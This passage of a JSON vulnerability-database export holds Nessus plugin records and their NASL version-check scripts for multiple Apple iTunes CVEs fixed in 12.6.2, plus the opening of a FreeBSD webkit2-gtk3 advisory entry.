Windows host is\nprior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. 
An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. 
(CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101954);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. 
A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.6.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:32:52", "description": "The version of Apple iTunes running on the remote host is prior to\n12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. 
(CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this, via\n a specially crafted application, to execute arbitrary\n code with system privileges. (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_6_2_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/101955", "sourceData": "#\n# (C) Tenable Network 
Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101955);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes running on the remote host is prior to\n12.6.2. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. 
An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this, via\n a specially crafted application, to execute arbitrary\n code with system privileges. (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. 
(CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nfixed_version = \"12.6.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T03:37:59", "description": "The version of Apple iTunes installed on the remote macOS or Mac OS X\nhost is prior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. 
An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. 
(CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-25T00:00:00", "title": "Apple iTunes < 12.6.2 Multiple Vulnerabilities (macOS) (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "MACOS_ITUNES_12_6_2.NASL", "href": "https://www.tenable.com/plugins/nessus/101956", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101956);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-7010\",\n \"CVE-2017-7012\",\n \"CVE-2017-7013\",\n \"CVE-2017-7018\",\n \"CVE-2017-7019\",\n \"CVE-2017-7020\",\n \"CVE-2017-7030\",\n \"CVE-2017-7034\",\n \"CVE-2017-7037\",\n \"CVE-2017-7039\",\n \"CVE-2017-7040\",\n \"CVE-2017-7041\",\n \"CVE-2017-7042\",\n \"CVE-2017-7043\",\n \"CVE-2017-7046\",\n \"CVE-2017-7048\",\n \"CVE-2017-7049\",\n \"CVE-2017-7052\",\n \"CVE-2017-7053\",\n \"CVE-2017-7055\",\n \"CVE-2017-7056\",\n \"CVE-2017-7061\",\n \"CVE-2017-7064\"\n );\n script_bugtraq_id(\n 99879,\n 99884,\n 99885,\n 99889,\n 99890\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-07-19-6\");\n\n script_name(english:\"Apple iTunes < 12.6.2 Multiple Vulnerabilities (macOS) (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote macOS or Mac OS X\nhost is prior to 12.6.2. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Multiple out-of-bounds read errors exist in the libxml2\n component due to improper handling of specially crafted\n XML documents. An unauthenticated, remote attacker can\n exploit these to disclose user information.\n (CVE-2017-7010, CVE-2017-7013)\n\n - Multiple memory corruption issues exist in the Webkit\n Web Inspector component due to improper validation of\n user-supplied input. An unauthenticated, remote attacker\n can exploit these, via a specially crafted web page, to\n corrupt memory, resulting in the execution of arbitrary\n code. (CVE-2017-7012)\n\n - Multiple memory corruption issues exist in the WebKit\n component due to improper validation of input. An\n unauthenticated, remote attacker can exploit these\n issues, via a specially crafted web page, to execute\n arbitrary code. (CVE-2017-7018, CVE-2017-7020,\n CVE-2017-7030, CVE-2017-7034, CVE-2017-7037,\n CVE-2017-7039, CVE-2017-7040, CVE-2017-7041,\n CVE-2017-7042, CVE-2017-7043, CVE-2017-7046,\n CVE-2017-7048, CVE-2017-7049, CVE-2017-7052,\n CVE-2017-7055, CVE-2017-7056, CVE-2017-7061)\n\n - A memory corruption issue exists in the 'WebKit Page\n Loading' component due to improper validation of input.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted web page, to execute arbitrary\n code. (CVE-2017-7019)\n\n - A flaw exists in the iPodService component when handling\n the iPodManager COM control due to insufficient access\n restrictions. A local attacker can exploit this to\n execute arbitrary code with system privileges.\n (CVE-2017-7053)\n\n - An unspecified memory initialization issue exists in\n Webkit. 
A local attacker can exploit this, via a\n specially crafted application, to disclose the contents\n of restricted memory. (CVE-2017-7064)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207928\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.6.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7053\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_itunes_detect.nasl\");\n script_require_keys(\"Host/MacOSX/Version\", \"installed_sw/iTunes\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"iTunes\");\n\nconstraints = [{\"fixed_version\" : \"12.6.2\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:47:20", "description": "The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-26T00:00:00", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "modified": "2017-07-26T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:webkit2-gtk3"], "id": "FREEBSD_PKG_0F66B901715C11E7AD1FBCAEC565249C.NASL", "href": "https://www.tenable.com/plugins/nessus/101966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or 
without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101966);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7006\", \"CVE-2017-7011\", \"CVE-2017-7012\", \"CVE-2017-7018\", \"CVE-2017-7019\", \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7038\", \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\", \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7049\", 
\"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7059\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (0f66b901-715c-11e7-ad1f-bcaec565249c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Webkit gtk team reports :\n\nPlease reference CVE/URL list for details\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0006.html\"\n );\n # https://vuxml.freebsd.org/freebsd/0f66b901-715c-11e7-ad1f-bcaec565249c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?071f4a9f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
